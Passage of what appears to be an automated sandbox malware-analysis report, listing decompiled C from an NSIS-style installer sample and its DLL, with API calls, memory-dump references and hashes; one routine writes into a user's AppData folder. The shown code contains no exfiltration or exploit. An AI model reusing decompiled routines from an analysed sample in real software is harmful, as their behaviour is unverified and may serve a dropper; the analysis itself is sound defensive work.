                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E100015FF(struct HINSTANCE__* _a4, short* _a8) {
				_Unknown_base(*)()* _t7;
				void* _t10;
				int _t14;

				_t14 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, 0, 0, 0, 0);
				_t10 = GlobalAlloc(0x40, _t14);
				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t10, _t14, 0, 0);
				_t7 = GetProcAddress(_a4, _t10);
				GlobalFree(_t10);
				return _t7;
			}






                                                        0x10001619
                                                        0x10001625
                                                        0x10001632
                                                        0x10001639
                                                        0x10001642
                                                        0x1000164e

                                                        APIs
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
                                                        • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
                                                        • GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
                                                        • GlobalFree.KERNEL32 ref: 10001642
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.841534468.0000000010001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000002.00000002.841525683.0000000010000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000002.00000002.841545533.0000000010003000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000002.00000002.841553679.0000000010005000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_10000000_u5p3.jbxd
                                                        Similarity
                                                        • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                        • String ID: Nqt@hqt
                                                        • API String ID: 1148316912-2613664712
                                                        • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                        • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                                        • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                        • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00402DD7 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00402DD7(struct HWND__* _a4, intOrPtr _a8) {
				short _v132;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x40ce98; // 0x54265
					_t11 =  *0x418ea4; // 0x54269
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfW( &_v132, L"verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextW(_a4,  &_v132);
					SetDlgItemTextW(_a4, 0x406,  &_v132);
				}
				return 0;
			}






                                                        0x00402de7
                                                        0x00402df5
                                                        0x00402dfb
                                                        0x00402dfb
                                                        0x00402e09
                                                        0x00402e0b
                                                        0x00402e11
                                                        0x00402e18
                                                        0x00402e1a
                                                        0x00402e1a
                                                        0x00402e30
                                                        0x00402e40
                                                        0x00402e52
                                                        0x00402e52
                                                        0x00402e5a

                                                        APIs
                                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DF5
                                                        • MulDiv.KERNEL32(00054265,00000064,00054269), ref: 00402E20
                                                        • wsprintfW.USER32 ref: 00402E30
                                                        • SetWindowTextW.USER32(?,?), ref: 00402E40
                                                        • SetDlgItemTextW.USER32 ref: 00402E52
                                                        Strings
                                                        • verifying installer: %d%%, xrefs: 00402E2A
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.840698964.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.840692098.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840709205.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_u5p3.jbxd
                                                        Similarity
                                                        • API ID: Text$ItemTimerWindowwsprintf
                                                        • String ID: verifying installer: %d%%
                                                        • API String ID: 1451636040-82062127
                                                        • Opcode ID: e049c72b028903268a13e0303fe007745629d422319b61ed44a985218b4f833f
                                                        • Instruction ID: 725db9d4d41e60ee2dd5d311e5346f84fbed97106a71cca60d70b9a4d06edbb5
                                                        • Opcode Fuzzy Hash: e049c72b028903268a13e0303fe007745629d422319b61ed44a985218b4f833f
                                                        • Instruction Fuzzy Hash: 73014471640208ABDF209F60DD49FAA3B69EB00708F008039FA05F91D0DBB989558B99
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 100024A4 Relevance: 9.1, APIs: 6, Instructions: 98COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 76%
                                                        			E100024A4(intOrPtr* _a4) {
				intOrPtr _v4;
				intOrPtr* _t24;
				void* _t26;
				intOrPtr _t27;
				signed int _t35;
				void* _t39;
				intOrPtr _t40;
				void* _t43;

				_t39 = E1000121B();
				_t24 = _a4;
				_t40 =  *((intOrPtr*)(_t24 + 0x1014));
				_v4 = _t40;
				_t43 = (_t40 + 0x81 << 5) + _t24;
				do {
					if( *((intOrPtr*)(_t43 - 4)) != 0xffffffff) {
					}
					_t35 =  *(_t43 - 8);
					if(_t35 <= 7) {
						switch( *((intOrPtr*)(_t35 * 4 +  &M100025B4))) {
							case 0:
								 *_t39 =  *_t39 & 0x00000000;
								goto L15;
							case 1:
								_push( *__eax);
								goto L13;
							case 2:
								__eax = E10001470(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
								goto L14;
							case 3:
								__ecx =  *0x1000406c;
								__edx = __ecx - 1;
								__eax = MultiByteToWideChar(0, 0,  *__eax, __ecx, __edi, __edx);
								__eax =  *0x1000406c;
								 *(__edi + __eax * 2 - 2) =  *(__edi + __eax * 2 - 2) & 0x00000000;
								goto L15;
							case 4:
								__eax = lstrcpynW(__edi,  *__eax,  *0x1000406c);
								goto L15;
							case 5:
								_push( *0x1000406c);
								_push(__edi);
								_push( *__eax);
								__imp__StringFromGUID2();
								goto L15;
							case 6:
								_push( *__esi);
								L13:
								__eax = wsprintfW(__edi, __ebp);
								L14:
								__esp = __esp + 0xc;
								goto L15;
						}
					}
					L15:
					_t26 =  *(_t43 + 0x14);
					if(_t26 != 0 && ( *_a4 != 2 ||  *((intOrPtr*)(_t43 - 4)) > 0)) {
						GlobalFree(_t26);
					}
					_t27 =  *((intOrPtr*)(_t43 + 0xc));
					if(_t27 != 0) {
						if(_t27 != 0xffffffff) {
							if(_t27 > 0) {
								E100012E1(_t27 - 1, _t39);
								goto L24;
							}
						} else {
							E10001272(_t39);
							L24:
						}
					}
					_v4 = _v4 - 1;
					_t43 = _t43 - 0x20;
				} while (_v4 >= 0);
				return GlobalFree(_t39);
			}











                                                        0x100024ae
                                                        0x100024b0
                                                        0x100024bf
                                                        0x100024c5
                                                        0x100024d2
                                                        0x100024d4
                                                        0x100024d8
                                                        0x100024d8
                                                        0x100024e0
                                                        0x100024e6
                                                        0x100024e8
                                                        0x00000000
                                                        0x100024ef
                                                        0x00000000
                                                        0x00000000
                                                        0x100024f5
                                                        0x00000000
                                                        0x00000000
                                                        0x100024ff
                                                        0x00000000
                                                        0x00000000
                                                        0x10002506
                                                        0x1000250c
                                                        0x10002518
                                                        0x1000251e
                                                        0x10002523
                                                        0x00000000
                                                        0x00000000
                                                        0x10002545
                                                        0x00000000
                                                        0x00000000
                                                        0x1000252b
                                                        0x10002531
                                                        0x10002532
                                                        0x10002534
                                                        0x00000000
                                                        0x00000000
                                                        0x1000254d
                                                        0x1000254f
                                                        0x10002551
                                                        0x10002553
                                                        0x10002553
                                                        0x00000000
                                                        0x00000000
                                                        0x100024e8
                                                        0x10002556
                                                        0x10002556
                                                        0x1000255b
                                                        0x1000256d
                                                        0x1000256d
                                                        0x10002573
                                                        0x10002578
                                                        0x1000257d
                                                        0x10002589
                                                        0x1000258e
                                                        0x00000000
                                                        0x10002593
                                                        0x1000257f
                                                        0x10002580
                                                        0x10002594
                                                        0x10002594
                                                        0x1000257d
                                                        0x10002595
                                                        0x10002599
                                                        0x1000259c
                                                        0x100025b3

                                                        APIs
                                                          • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                        • GlobalFree.KERNEL32 ref: 1000256D
                                                        • GlobalFree.KERNEL32 ref: 100025A8
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.841534468.0000000010001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000002.00000002.841525683.0000000010000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000002.00000002.841545533.0000000010003000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000002.00000002.841553679.0000000010005000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_10000000_u5p3.jbxd
                                                        Similarity
                                                        • API ID: Global$Free$Alloc
                                                        • String ID:
                                                        • API String ID: 1780285237-0
                                                        • Opcode ID: e72053471c67904cbc9fe51406c75cdd0d1e7ae72e07fb5691a107031e3f1593
                                                        • Instruction ID: 149f0ffe7112dafd64944f245e56057b96fa329c468151baa91e3d773918aa42
                                                        • Opcode Fuzzy Hash: e72053471c67904cbc9fe51406c75cdd0d1e7ae72e07fb5691a107031e3f1593
                                                        • Instruction Fuzzy Hash: 1031AF71504651EFF721CF14CCA8E2B7BB8FB853D2F114119F940961A8C7719851DB69
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004028A7 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 37%
                                                        			E004028A7(void* __ebx) {
				void* _t26;
				long _t31;
				void* _t45;
				void* _t49;
				void* _t51;
				void* _t54;
				void* _t55;
				void* _t56;

				_t45 = __ebx;
				 *((intOrPtr*)(_t56 - 0x30)) = 0xfffffd66;
				_t50 = E00402C37(0xfffffff0);
				 *(_t56 - 0x38) = _t23;
				if(E00405B94(_t50) == 0) {
					E00402C37(0xffffffed);
				}
				E00405D19(_t50);
				_t26 = E00405D3E(_t50, 0x40000000, 2);
				 *(_t56 + 8) = _t26;
				if(_t26 != 0xffffffff) {
					_t31 =  *0x42a218;
					 *(_t56 - 0x3c) = _t31;
					_t49 = GlobalAlloc(0x40, _t31);
					if(_t49 != _t45) {
						E004032F5(_t45);
						E004032DF(_t49,  *(_t56 - 0x3c));
						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x20));
						 *(_t56 - 0x4c) = _t54;
						if(_t54 != _t45) {
							_push( *(_t56 - 0x20));
							_push(_t54);
							_push(_t45);
							_push( *((intOrPtr*)(_t56 - 0x24)));
							E004030FA();
							while( *_t54 != _t45) {
								_t47 =  *_t54;
								_t55 = _t54 + 8;
								 *(_t56 - 0x34) =  *_t54;
								E00405CF9( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
								_t54 = _t55 +  *(_t56 - 0x34);
							}
							GlobalFree( *(_t56 - 0x4c));
						}
						E00405DF0( *(_t56 + 8), _t49,  *(_t56 - 0x3c));
						GlobalFree(_t49);
						_push(_t45);
						_push(_t45);
						_push( *(_t56 + 8));
						_push(0xffffffff);
						 *((intOrPtr*)(_t56 - 0x30)) = E004030FA();
					}
					CloseHandle( *(_t56 + 8));
				}
				_t51 = 0xfffffff3;
				if( *((intOrPtr*)(_t56 - 0x30)) < _t45) {
					_t51 = 0xffffffef;
					DeleteFileW( *(_t56 - 0x38));
					 *((intOrPtr*)(_t56 - 4)) = 1;
				}
				_push(_t51);
				E00401423();
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t56 - 4));
				return 0;
			}











                                                        0x004028a7
                                                        0x004028a9
                                                        0x004028b5
                                                        0x004028b8
                                                        0x004028c2
                                                        0x004028c6
                                                        0x004028c6
                                                        0x004028cc
                                                        0x004028d9
                                                        0x004028e1
                                                        0x004028e4
                                                        0x004028ea
                                                        0x004028f8
                                                        0x004028fd
                                                        0x00402901
                                                        0x00402904
                                                        0x0040290d
                                                        0x00402919
                                                        0x0040291d
                                                        0x00402920
                                                        0x00402922
                                                        0x00402925
                                                        0x00402926
                                                        0x00402927
                                                        0x0040292a
                                                        0x00402949
                                                        0x00402931
                                                        0x00402936
                                                        0x0040293e
                                                        0x00402941
                                                        0x00402946
                                                        0x00402946
                                                        0x00402950
                                                        0x00402950
                                                        0x0040295d
                                                        0x00402963
                                                        0x00402969
                                                        0x0040296a
                                                        0x0040296b
                                                        0x0040296e
                                                        0x00402975
                                                        0x00402975
                                                        0x0040297b
                                                        0x0040297b
                                                        0x00402986
                                                        0x00402987
                                                        0x0040298b
                                                        0x0040298f
                                                        0x00402995
                                                        0x00402995
                                                        0x0040299c
                                                        0x00402245
                                                        0x00402ac2
                                                        0x00402ace

                                                        APIs
                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 004028FB
                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 00402917
                                                        • GlobalFree.KERNEL32 ref: 00402950
                                                        • GlobalFree.KERNEL32 ref: 00402963
                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 0040297B
                                                        • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 0040298F
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.840698964.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.840692098.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840709205.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_u5p3.jbxd
                                                        Similarity
                                                        • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                        • String ID:
                                                        • API String ID: 2667972263-0
                                                        • Opcode ID: 794126d87b7ab7f3e2e070d8386bcb8afdde5fae5b7e809f26f6fd9fec4836ff
                                                        • Instruction ID: c6e800f027f1e1b1e461e4fc783814b3910171fe2b09394c7840a14eb176b3fb
                                                        • Opcode Fuzzy Hash: 794126d87b7ab7f3e2e070d8386bcb8afdde5fae5b7e809f26f6fd9fec4836ff
                                                        • Instruction Fuzzy Hash: 9821BFB1D00124BBDF206FA5DE49D9E7E79EF08364F10423AF954762E1CB794C419B98
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00404A6C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 77%
                                                        			E00404A6C(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v68;
				char _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				signed int _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t44;
				signed int _t46;
				signed int _t50;
				signed int _t52;
				signed int _t53;
				signed int _t55;

				_t23 = _a16;
				_t53 = _a12;
				_t44 = 0xffffffdc;
				if(_t23 == 0) {
					_push(0x14);
					_pop(0);
					_t24 = _t53;
					if(_t53 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t44 = 0xffffffdd;
					}
					if(_t53 < 0x400) {
						_t44 = 0xffffffde;
					}
					if(_t53 < 0xffff3333) {
						_t52 = 0x14;
						asm("cdq");
						_t24 = 1 / _t52 + _t53;
					}
					_t25 = _t24 & 0x00ffffff;
					_t55 = _t24 >> 0;
					_t46 = 0xa;
					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
				} else {
					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
					_t50 = 0;
				}
				_t31 = E0040626E(_t44, _t50, _t55,  &_v68, 0xffffffdf);
				_t33 = E0040626E(_t44, _t50, _t55,  &_v132, _t44);
				_t34 = E0040626E(_t44, _t50, 0x4236e8, 0x4236e8, _a8);
				wsprintfW(_t34 + lstrlenW(0x4236e8) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
				return SetDlgItemTextW( *0x4291d8, _a4, 0x4236e8);
			}



















                                                        0x00404a75
                                                        0x00404a7a
                                                        0x00404a82
                                                        0x00404a83
                                                        0x00404a90
                                                        0x00404a98
                                                        0x00404a99
                                                        0x00404a9b
                                                        0x00404a9d
                                                        0x00404a9f
                                                        0x00404aa2
                                                        0x00404aa2
                                                        0x00404aa9
                                                        0x00404aaf
                                                        0x00404aaf
                                                        0x00404ab6
                                                        0x00404abd
                                                        0x00404ac0
                                                        0x00404ac3
                                                        0x00404ac3
                                                        0x00404ac7
                                                        0x00404ad7
                                                        0x00404ad9
                                                        0x00404adc
                                                        0x00404a85
                                                        0x00404a85
                                                        0x00404a8c
                                                        0x00404a8c
                                                        0x00404ae4
                                                        0x00404aef
                                                        0x00404b05
                                                        0x00404b16
                                                        0x00404b32

                                                        APIs
                                                        • lstrlenW.KERNEL32(004236E8,004236E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B0D
                                                        • wsprintfW.USER32 ref: 00404B16
                                                        • SetDlgItemTextW.USER32 ref: 00404B29
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.840698964.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.840692098.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840709205.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_u5p3.jbxd
                                                        Similarity
                                                        • API ID: ItemTextlstrlenwsprintf
                                                        • String ID: %u.%u%s%s$6B
                                                        • API String ID: 3540041739-3884863406
                                                        • Opcode ID: 95c3251a73d665659f4e5ef41dc4b3ed63ce9024b19b633afc4b02d7477ffd45
                                                        • Instruction ID: 5e68f5a3766037a7274f1f000e531c578f4d2f2b22a3e42eca2e55653584bdbe
                                                        • Opcode Fuzzy Hash: 95c3251a73d665659f4e5ef41dc4b3ed63ce9024b19b633afc4b02d7477ffd45
                                                        • Instruction Fuzzy Hash: F111D8736481283BDB00656D9C45E9F329CDB81374F150237FE66F61D1D9788C2186EC
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00402592 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69stringCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 88%
                                                        			E00402592(int __ebx, void* __edx, intOrPtr* __esi) {
				signed int _t14;
				int _t17;
				int _t24;
				signed int _t29;
				intOrPtr* _t32;
				void* _t34;
				void* _t35;
				void* _t38;
				signed int _t40;

				_t32 = __esi;
				_t24 = __ebx;
				_t14 =  *(_t35 - 0x20);
				_t38 = __edx - 0x38;
				 *(_t35 - 0x4c) = _t14;
				_t27 = 0 | _t38 == 0x00000000;
				_t29 = _t38 == 0;
				if(_t14 == __ebx) {
					if(__edx != 0x38) {
						_t17 = lstrlenW(E00402C37(0x11)) + _t16;
					} else {
						E00402C37(0x21);
						WideCharToMultiByte(__ebx, __ebx, "Finishs", 0xffffffff, "C:\Users\jones\AppData\Roaming\Microsoft\Windows", 0x400, __ebx, __ebx);
						_t17 = lstrlenA("C:\Users\jones\AppData\Roaming\Microsoft\Windows");
					}
				} else {
					E00402C15(1);
					 *0x40ada8 = __ax;
					 *((intOrPtr*)(__ebp - 0x3c)) = __edx;
				}
				 *(_t35 + 8) = _t17;
				if( *_t32 == _t24) {
					L13:
					 *((intOrPtr*)(_t35 - 4)) = 1;
				} else {
					_t34 = E004061AC(_t27, _t32);
					if((_t29 |  *(_t35 - 0x4c)) != 0 ||  *((intOrPtr*)(_t35 - 0x1c)) == _t24 || E00405E1F(_t34, _t34) >= 0) {
						_t14 = E00405DF0(_t34, "C:\Users\jones\AppData\Roaming\Microsoft\Windows",  *(_t35 + 8));
						_t40 = _t14;
						if(_t40 == 0) {
							goto L13;
						}
					} else {
						goto L13;
					}
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}












                                                        0x00402592
                                                        0x00402592
                                                        0x00402592
                                                        0x00402597
                                                        0x0040259a
                                                        0x0040259d
                                                        0x004025a2
                                                        0x004025a4
                                                        0x004025c4
                                                        0x00402602
                                                        0x004025c6
                                                        0x004025c8
                                                        0x004025e2
                                                        0x004025ed
                                                        0x004025ed
                                                        0x004025a6
                                                        0x004025a8
                                                        0x004025ad
                                                        0x004025bb
                                                        0x004025be
                                                        0x00402607
                                                        0x0040260a
                                                        0x00402885
                                                        0x00402885
                                                        0x00402610
                                                        0x00402619
                                                        0x0040261b
                                                        0x0040263a
                                                        0x004015b4
                                                        0x004015b6
                                                        0x00000000
                                                        0x004015bc
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x0040261b
                                                        0x00402ac2
                                                        0x00402ace

                                                        APIs
                                                        • WideCharToMultiByte.KERNEL32(?,?,Finishs,000000FF,C:\Users\user\AppData\Roaming\Microsoft\Windows,00000400,?,?,00000021), ref: 004025E2
                                                        • lstrlenA.KERNEL32(C:\Users\user\AppData\Roaming\Microsoft\Windows,?,?,Finishs,000000FF,C:\Users\user\AppData\Roaming\Microsoft\Windows,00000400,?,?,00000021), ref: 004025ED
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.840698964.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.840692098.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840709205.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_u5p3.jbxd
                                                        Similarity
                                                        • API ID: ByteCharMultiWidelstrlen
                                                        • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows$Finishs
                                                        • API String ID: 3109718747-2054353957
                                                        • Opcode ID: 4caddf9fd98015af0c89a896aabe676fd06aff106387eddf506ca1aab1ee46e7
                                                        • Instruction ID: 514f5b9530cea4d9367e026ee51610d144416164e286c499b2b09fde189c8ffc
                                                        • Opcode Fuzzy Hash: 4caddf9fd98015af0c89a896aabe676fd06aff106387eddf506ca1aab1ee46e7
                                                        • Instruction Fuzzy Hash: B8113B32A00200FFDB146FB18E8D99F76649F54345F20843BF502F22C1D9BC49415B5E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 100018A9 Relevance: 7.7, APIs: 5, Instructions: 189COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 97%
                                                        			E100018A9(signed int __edx, void* __eflags, void* _a8, void* _a16) {
				void* _v8;
				signed int _v12;
				signed int _v20;
				signed int _v24;
				char _v76;
				void* _t43;
				signed int _t44;
				signed int _t59;
				void _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				signed int _t68;
				signed int _t70;
				signed int _t71;
				void* _t76;
				void* _t77;
				void* _t78;
				void* _t79;
				void* _t80;
				signed int _t84;
				signed int _t86;
				signed int _t89;
				void* _t100;

				_t84 = __edx;
				 *0x1000406c = _a8;
				_t59 = 0;
				 *0x10004070 = _a16;
				_v12 = 0;
				_v8 = E10001243();
				_t89 = E10001311(_t41);
				_t86 = _t84;
				_t43 = E10001243();
				_t63 =  *_t43;
				_a8 = _t43;
				if(_t63 != 0x7e && _t63 != 0x21) {
					_a16 = E10001243();
					_t59 = E10001311(_t56);
					_v12 = _t84;
					GlobalFree(_a16);
					_t43 = _a8;
				}
				_t64 =  *_t43 & 0x0000ffff;
				_t100 = _t64 - 0x2f;
				if(_t100 > 0) {
					_t65 = _t64 - 0x3c;
					__eflags = _t65;
					if(_t65 == 0) {
						__eflags =  *((short*)(_t43 + 2)) - 0x3c;
						if( *((short*)(_t43 + 2)) != 0x3c) {
							__eflags = _t86 - _v12;
							if(__eflags > 0) {
